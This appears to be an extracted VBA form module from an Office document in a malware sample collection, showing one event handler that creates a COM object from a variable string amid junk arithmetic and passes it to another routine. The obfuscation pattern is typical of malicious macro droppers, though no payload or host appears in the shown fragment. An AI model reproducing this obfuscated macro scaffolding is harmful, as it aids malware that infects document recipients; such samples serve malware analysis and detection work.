Filename     : ./macros/6180bd1532330c9beb3baca849d178773e88a526b4a0d9543bedd05a86687f79
OLE stream   : Macros/VBA/psytasdu
VBA filename : psytasdu.frm
----------------------------------------
Attribute VB_Name = "psytasdu"
Attribute VB_Base = "0{DE78740B-326A-4A04-A9EC-32D64A1C515E}{929BFF99-AD93-4F2E-BDF9-3315C30D00E6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub cherensf_Change()
Set wrujouw3 = CreateObject(bivawnop)
goneunlock = 69 * 99
goneunlock = 54 + 1
goneunlock = 54 + 55 + 7
goneunlock = goneunlock - 100 * goneunlock + 1
goneunlock = goneunlock + 8
goneunlock = 84 + 9
amypebbles wrujouw3
End Sub


